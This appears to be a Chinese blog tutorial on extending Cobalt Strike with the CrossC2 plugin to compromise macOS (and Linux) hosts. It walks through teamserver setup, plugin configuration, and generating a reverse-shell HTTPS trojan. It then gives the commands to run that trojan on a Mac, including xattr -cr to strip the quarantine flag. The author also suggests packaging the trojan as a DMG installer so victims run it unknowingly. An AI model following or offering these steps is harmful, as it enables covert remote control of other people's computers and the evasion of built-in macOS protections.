前言
- 我们知道CS原生只支持Windows上线,那么对于MacOS、Linux我们可以通过CrossC2插件实现上线
- 下载地址:https://github.com/gloxec/CrossC2/releases
- 我这里主要是演示上线MacOS,上线Linux是相同的,参考文章:https://blog.csdn.net/m0_61867082/article/details/131386931
环境
- 客户端 是Windows/Linux/Mac均可,只需要下载对应的脚本文件即可:
- 然后CS的版本是4.7、4.8都可以,我们需要准备的文件有:
shell
1. CrossC2-GithubBot-2023-11-20.cna # 插件本身
2. genCrossC2.exe # 客户端是哪个就下哪个
3. .cobaltstrike.beacon_keys # 从服务器TeamServer中下载到客户端- 注意这里
.cobaltstrike.beacon_keys文件一定要从服务端下载到客户端本地 - CS服务器尽量选用的是Linux,直接启动即可
shell
./teamserver <IP> <password>
- 接着在客户端先配置
CrossC2-GithubBot-2023-11-20.cna中的$CC2_PATH和$CC2_BIN:
shell
$CC2_PATH = "D:/path/CrossC2/"; # <-------- fix
$CC2_BIN = "genCrossC2.exe";
- ++需要注意的就是++ :
- 尽量不要包含中文路径(当然可以包含)
$CC2_PATH是绝对路径,最后必须要有/- 然后
$CC2_BIN这个就根据你下载的脚本名称填写即可
木马生成
- 首先创建监听器:
- 然后加载我们的CrossC2插件,选择刚才下载的
.cna文件:
- 加载成功之后右上角就会多出
CrossC2的插件:
- 这里选择创建反向Shell的HTTPS监听器,根据标注的内容创建即可:
- 点击生成他就会自动调用
genCrossC2.exe创建木马程序,我们可以在事件监听器上看到如下日志:
- 如果有红色框标记的地方即生成成功,如果没有可以将这条命令放到cmd/bash上执行一下看看报错
CS上线
- 将生成的木马(只需要mactest即可,不用mactest.lib文件)放到Mac机器上,然后执行如下命令:
shell
# 赋予执行权限
chmod +x mactest
# 移除文件的隔离标记
xattr -cr mactest
# 执行该文件
./mactest
- 成功上线并且正常执行命令,当然在实战当中肯定不可能这么搞,还需要手动执行chmod、xttar这些命令
- 我们进阶的玩法就是可以将这个东西直接弄成可执行程序,或者弄成dmg的安装镜像,让他自己执行这些危险命令
- 这些都是我们之后要考虑的事情了,我这里主要是测试一下能不能上线MacOS